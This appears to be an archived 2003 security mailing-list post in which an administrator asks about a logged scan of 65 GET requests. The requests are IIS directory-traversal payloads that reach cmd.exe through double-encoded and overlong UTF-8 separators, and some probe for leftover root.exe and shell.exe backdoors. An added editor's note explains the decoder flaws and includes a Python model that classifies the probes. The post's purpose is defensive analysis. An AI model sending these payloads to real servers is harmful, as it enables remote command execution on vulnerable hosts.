New attack or old Vulnerability Scanner?

From: Mark Embrich (mark_embrichat_private)
Date: Thu Apr 24 2003 - 16:43:43 PDT


    Hello,
    
    Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
    Note that it also included:  "User-Agent:.Mozilla/3.0.(compatible;.Indy.Library)...."
    My googling tells me that this attack/scanner is probably built using
    the Borland Delphi/C++ Builder suite.
    
    I've so far received 3 of these from 2 different IP addresses.
    The first two were from a Comcast cable user.
    The last was from a Cox Communications IP.
    
    Thanks,
    Mark Embrich
    
    0.	Scan TCP 80
    1.	GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    2.	GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    3.	GET./_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    4.	GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    5.	GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    6.	GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    7.	GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    8.	GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    9.	GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    10.	GET./_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    11.	GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    12.	GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    13.	GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    14.	GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    15.	GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    16.	GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    17.	GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    18.	GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    19.	GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    20.	GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    21.	GET./msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    22.	GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    23.	GET./msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    24.	GET./MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    25.	GET./msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    26.	GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    27.	GET./msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    28.	GET./msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    29.	GET./msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    30.	GET./msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    31.	GET./msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    32.	GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
    33.	GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
    34.	GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
    35.	GET./PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    36.	GET./PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    37.	GET./PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    38.	GET./PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    39.	GET./Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    40.	GET./Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    41.	GET./Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    42.	GET./Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    43.	GET./samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    44.	GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    45.	GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    46.	GET./scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    47.	GET./scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    48.	GET./scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    49.	GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    50.	GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    51.	GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    52.	GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    53.	GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    54.	GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    55.	GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    56.	GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    57.	GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    58.	GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    59.	GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    60.	GET./scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    61.	GET./scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    62.	GET./scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    63.	GET./scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
    64.	GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
    65.	GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..
    
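Editor's note, added to the archive and not part of Mark's message: every GET in the log above spells `..\` or `../` in an encoding that a correct decoder rejects but a buggy one accepts. `%255c`, `%%35%63`, `%25%35%63` and `%%35c` all become `%5c` after one round of %XX decoding and `\` only after a second round (the IIS "superfluous decoding" bug, MS01-026); `%c0%af`, `%c1%9c`, `%e0%80%af` through `%fc%80%80%80%80%af` are overlong UTF-8 forms of `/` and `\` (the IIS "Unicode" traversal, MS00-078); `%c1%1c` only works because that decoder never checked that continuation bytes begin with the bits `10`; `root.exe` and `shell.exe` are names of cmd.exe copies left behind by earlier worms. The following Python model, written for this note, shows both a strict decoder and a lenient one reproducing those three flaws. The lenient decoder is a model of the documented behaviour, not IIS source; the probe paths are re-typed from entries 1, 4, 17, 49, 54, 57, 63 and 64 of the log, with the log's `.` placeholders for non-printable bytes dropped.

```python
"""Lenient-vs-strict decoding of the IIS traversal probes quoted above.
Added example; the lenient decoder models the documented decoder flaws
(double %XX decode, overlong UTF-8 accepted, continuation bytes unchecked)
and is not IIS's actual code."""
import re

_PCT = re.compile(rb"%([0-9A-Fa-f]{2})")


def percent_decode_once(raw: bytes) -> bytes:
    """One pass of %XX decoding; malformed escapes such as %9v stay literal."""
    return _PCT.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def lenient_utf8(data: bytes) -> str:
    """UTF-8 decoding with the flaws the 'Unicode' probes rely on: overlong
    forms are accepted (C0 AF -> '/') and continuation bytes are never
    validated, only masked with 0x3F (C1 1C -> '\\').  Model of the bug."""
    out, i, n = [], 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        if   b & 0xE0 == 0xC0: extra, val = 1, b & 0x1F
        elif b & 0xF0 == 0xE0: extra, val = 2, b & 0x0F
        elif b & 0xF8 == 0xF0: extra, val = 3, b & 0x07
        elif b & 0xFC == 0xF8: extra, val = 4, b & 0x03   # old 5-byte form
        elif b & 0xFE == 0xFC: extra, val = 5, b & 0x01   # old 6-byte form
        else:
            out.append("\ufffd"); i += 1; continue
        if i + extra >= n:                                # truncated sequence
            out.append("\ufffd"); break
        for k in range(1, extra + 1):
            val = (val << 6) | (data[i + k] & 0x3F)       # no 10xxxxxx check
        out.append(chr(val) if val < 0x110000 else "\ufffd")
        i += extra + 1
    return "".join(out)


def strict_utf8(data: bytes) -> str:
    """What a correct decoder does: overlong and invalid bytes become U+FFFD."""
    return data.decode("utf-8", errors="replace")


def decode_path(path: str, rounds: int, lenient: bool) -> str:
    """rounds=1 is correct behaviour; rounds=2 models the double-decode bug."""
    raw = path.encode("latin-1")
    for _ in range(rounds):
        raw = percent_decode_once(raw)
    return lenient_utf8(raw) if lenient else strict_utf8(raw)


def resolve(decoded: str):
    """Normalise '\\' to '/', collapse '.' and '..', and report whether the
    path climbs out of its virtual directory (the first path component)."""
    parts = decoded.split("?", 1)[0].replace("\\", "/").split("/")
    stack, escaped = [], False
    for p in parts:
        if p in ("", "."):
            continue
        if p == "..":
            if stack:
                stack.pop()
            if not stack:             # popped the vdir itself, or already above it
                escaped = True
        else:
            stack.append(p)
    return "/" + "/".join(stack), escaped


SHELLS = {"cmd.exe", "root.exe", "shell.exe"}


def classify(request_path: str, strict: bool) -> dict:
    """strict=True: one %XX pass and real UTF-8.  strict=False: lenient model."""
    decoded = decode_path(request_path, 1 if strict else 2, lenient=not strict)
    resolved, escaped = resolve(decoded)
    target = resolved.rsplit("/", 1)[-1].lower()
    return {"decoded": decoded, "resolved": resolved,
            "escapes_vdir": escaped, "shell": target in SHELLS}


# Re-typed from entries 1, 4, 17, 49, 54, 57, 63 and 64 of the posted log;
# the log's "." placeholders for non-printable bytes are dropped.
PROBES = [
    "/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:",                    # %25 -> %5c -> '\'
    "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:",
    "/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:",
    "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:",               # malformed hex digit
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:",               # bad continuation byte
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:",               # overlong '\'
    "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:",   # 6-byte overlong '/'
    "/scripts/root.exe?/c+dir+c:",                                        # leftover backdoor name
]


def count_escapes(probes, strict: bool) -> int:
    """How many probes climb out of their virtual directory under a decoder."""
    return sum(1 for p in probes if classify(p, strict)["escapes_vdir"])


if __name__ == "__main__":
    for p in PROBES:
        for strict in (True, False):
            r = classify(p, strict)
            print(f"{'strict ' if strict else 'lenient'} escapes={r['escapes_vdir']!s:<5} {r['resolved']}")
    print("escapes: lenient", count_escapes(PROBES, False), "strict", count_escapes(PROBES, True))
```

Under the strict decoder none of the eight paths leaves its virtual directory; under the lenient model six of them resolve to `/winnt/system32/cmd.exe`. The two that never work are the malformed `%c0%9v` variant (the `%9v` is not a valid escape, so no decoder turns it into a separator) and `/scripts/root.exe`, which is not a traversal at all but a check for a shell copy already sitting in the web tree. Running the whole log through the same functions is a quick way to see that the 65 requests are a fixed catalogue of encoder variants rather than anything targeted at a specific server.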
    



    This archive was generated by hypermail 2b30 : Fri Apr 25 2003 - 11:43:04 PDT